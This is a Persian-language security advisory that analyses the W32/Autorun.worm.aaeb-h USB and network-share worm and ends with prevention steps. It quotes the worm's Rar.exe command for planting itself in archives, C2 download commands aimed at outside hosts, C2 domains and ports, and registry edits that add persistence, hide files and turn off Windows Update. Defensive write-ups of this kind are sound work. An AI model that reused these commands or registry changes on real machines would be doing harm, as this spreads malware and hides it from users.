چيست؟
ويروسی که عملکرد “کرم” (Worm) داشته و در صورت اجرا حافظه های قابل حمل و درایو های اشتراک گذاشته شده را آلوده می سازد و می تواند به عنوان ابزاری جهت دریافت برنامه های ناخواسته و مخرب از مرکز کنترل و فرماندهی خود و اجرای آنها بر روی سیستم آلوده، مورداستفاده قرار گیرد. گرچه اولين نمونه ويروس W32/Autorun.worm.aaeb-h، در بهمن ماه سال 1391 مشاهده شده است اما این بدافزار از خانواده VBObfus می باشد که تاکنون بیش از یک میلیون نمونه متفاوت از آن شناسایی شده است! در حال حاضر میزان آلودگی به این ویروس در ایران قابل توجه بوده و روزی چند نمونه جدید از آن کشف می شود.
انتشار
ويروس W32/Autorun.worm.aaeb-h با کپی کردن خود در ابزارهای ذخيره سازی USB (در صورت وجود) و در شاخه های اشتراکی (Share) ساير دستگاه های شبکه، خود را منتشر ساخته و آنها را هم در معرض آلودگی قرار می دهد. به اين صورت که اگر درايو C دستگاهی در شبکه برای کامپيوتر آلوده قابل دسترسی باشد، کافی است فايل autorun.inf به همراه فایل آلوده در ريشه آن کپی شود تا بعد از راه اندازی دستگاه، کاربر با دوبار کليک کردن بر روی درايو C آلوده شود.
در واقع این کرم با ساختن فایل autorun.inf بصورت خودکار بر روی سیستم اجرا خواهد شد. کامپيوتر آلوده می تواند هر ديسک USB را نيز که به آن کامپيوتر وصل می شود، آلوده سازد. همچنين اين ويروس از طريق پوشه های به اشتراک گذاشته شده بر روی شبکه نيز اقدام به تکثير خود می کند.
خرابکاری
به محض اجرا شدن، فايلهای مخرب با نام های تصادفی در مسيرهای زير ذخيره می شوند:
– %UserProfile%\[random].exe
همچنین فایل زیر با حجم صفر بایت در ابزارهای ذخيره سازی USB ساخته می شود:
– x.mpeg
ویروس کپی هایی از خود را با نام های زیر می سازد:
– Secret.exe
– Sexy.exe
– Porn.exe
– Passwords. Exe
– Runme.exe
– gy.exe
– .exe
– .exe
و سپس چند بایت کلیدی را در فایل های ساخته شده تغییر می دهد تا این فایل ها توسط ضدویروس شناسایی نشوند. این تغییرات به گونه ای است که گویی کدهای ویروس تغییر یافته و دوباره ترجمه (Compile) شده باشد.
کرم W32/Autorun.worm.aaeb-h با اجرای دستور زیر یک کپی از خود را در فایل های فشرده ی ZIP و RAR قرار می دهد که باعث می شود با باز شدن این فایل ها ویروس نیز اجرا شود.
Rar.exe a -y -ep -IBCK “<rar/zip file found>” “%userprofile%\Secret.exe”
با آلوده شدن یک سیستم، ویروس تمامی فایل های موجود بر روی ابزارهای ذخیره سازی Usb با پسوندهای زیر را به صورت مخفی (Hidden) در می آورد و یک فایل همنام با فایل مخفی شده در همان مسیر می سازد.
– mp3
– avi
– wma
– wmv
– wav
– mpg
– mp4
– doc
– txt
– pdf
– xls
– jpg
– jpe
– bmp
– gif
– tif
– png
سپس با تغییر مقدار ارزش مدخل زیر در محضرخانه ی سیستم ویروس باعث می شود فایل های مخفی برروی سیستم نشان داده نشوند.
– HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ShowSuperHidden = dword:00000000
پس از آلوده شدن دستگاه در صورت وجود ارتباط اینترنتی، ویروس به سرویس دهنده ی کنترل و فرماندهی خود متصل شده و دستورات مخربی را دریافت می نماید، مثالی از این دستورات به صورت زیر می باشد:
:.dl http://<random 6 numbers>.zdns.eu:443/QJvDPNrUwp?f google.com
:.dl http://ks<random 7 numbers>.kimsufi.com
به محض دریافت دستورات مخرب از مرکز فرماندهی، ویروس اقدام به دریافت بدافزارها و برنامه های ناخواسته و اجرایشان بر روی سیستم می نماید. بیشترین موارد مشاهده شده ای که توسط ویروس دریافت می شوند از خانواده ی Zbot و BackDoor بوده است. در بعضی از نسخه های این ویروس دیده شده که ارتباط با مرکز فرماندهی به صورت رمزنگاری شده می باشد.
نشانی که ویروس از آن اقدام به دریافت بدافزارها می نماید متفاوت می باشد و به مرکز فرماندهی و کنترل بستگی دارد.
دامنه های زیر نمونه هایی از مراکز فرماندهی و کنترل این ویروس می باشند:
– Ns1.helpupdater.net
– ns1.helpupdater.net
– ns1.helpchecks.net
– ns1.helpupdated.com
– ns1.helpupdated.net
– ns1.thepicturehut.net
– ns1.player1253.com
– ns1.videoall.net
– ns1.mediashares.org
– ns1.cpuchecks.com
– ns1.timedate1.com
– ns1.timedate1.net
به صورت تصادفی از پسوندهای زیر برای دامنه های ذکر شده استفاده می شود:
– .com
– .net
– .org
– .biz
– .info
– .at
– .eu
– .by
هنگام ارتباط با سرویس دهنده ی کنترل و فرماندهی از پورت های زیر استفاده می شود:
– port 8002
– port 8000
– port 443
– port 80
– port 3128
– port 47221
– port 9004
– port 9904
– port 7005
از دیگر خرابکاری های ویروس می توان به غیرفعال شدن بروزرسانی خودکار سیستم عامل از طریق تغییر مدخل زیر در محضرخانه ی سیستم اشاره نمود:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
NoAutoUpdate = dword:00000001
کرم W32/Autorun.worm.aaeb-h با ساختن مدخل های زیر با هر بار راه اندازی مجدد سیستم اجرا خواهد شد:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
<malware name> =” %UserProfile%\<Random name>.exe /e”
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
<malware name> =” %UserProfile%\<Random name>.exe /c”
پيشگيری
به روز نگه داشتن ضدويروس، نصب آخرين اصلاحيه های سيستم عامل و استفاده از تنظيمات توصيه شده توسط کارشناسان شرکت مهندسی شبـکه گستـر در بخش Access Protection ضـدويـروس McAfee، نظير فعـال کـردن قاعده USB، همگی با هم می توانند خطر آلوده شدن به اين ويروس و يا گونه های مشابه را به حداقل برساند.
همینطور توصیه می شود با نصب اصلاحیه زیر قابلیت خوداجرایی (Autorun) سیستم عامل ویندوز را غیرفعال کنید:
http://support.microsoft.com/kb/971029
توجه داشته باشید که این اصلاحیه خود اجرای دیسکهای CD و DVD را تغییر نمی دهد و نیز سیستم عامل Windows 7 از ابتدا به این صورت تنظیم شده و نیازی به این اصلاحیه ندارد.
ضدویروس McAfee با فایلهای اطلاعاتی شماره 6990 گونه های کشف شده تا زمان نگارش این هشدار را شناسایی و پاکسازی می کند.